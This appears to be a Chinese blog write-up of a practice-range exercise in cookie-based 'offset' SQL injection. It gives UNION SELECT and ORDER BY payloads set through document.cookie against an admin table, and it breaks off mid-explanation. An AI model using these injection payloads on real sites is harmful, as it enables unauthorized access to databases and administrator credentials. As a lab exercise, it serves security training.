偏移注入靶场练习

本文介绍了在靶场环境中进行SQL注入实战的过程,通过调整SQL语句,逐步发现注入点和隐藏字段。通过二分法确定表的字段数,并利用数字后缀法找出所有隐藏的注入点,最终揭示了admin表的部分信息。
摘要由CSDN通过智能技术生成

document.cookie= “id=”+escape(“171 union select 1,2,3,4,5,6,7,8,9,admin. from admin”)
提示数据库报错,
一直减到:
document.cookie= “id=”+escape(“171 union select admin.
 from admin”)
仍然提示数据库报错。
说明注入点查询的表的字段数小于admin表中的字段数。

ps:漏洞不可能只存在一个,因为开发者开发思路是一样的,一般来说相似的漏洞会在同一个网站频繁出现。
在靶场产品中心的某个产品页面试下:
http://kypt8004.ia.aqlab.cn/ProductShow.asp?ID=105
document.cookie=”id=”+escape(“105 order by 1”) 页面正常
document.cookie=”id=”+escape(“105 order by 100”) 找不到此产品!
通过二分法不停找,发现26个字段。
document.cookie=”id=”+escape(“105 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin”)
可见3,5,7为注入点。
其实25也是注入点,隐藏在图片里。
那么,怎样才能把所有隐藏点都找到呢?
每个数字后面加一串容易辨识的长数

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值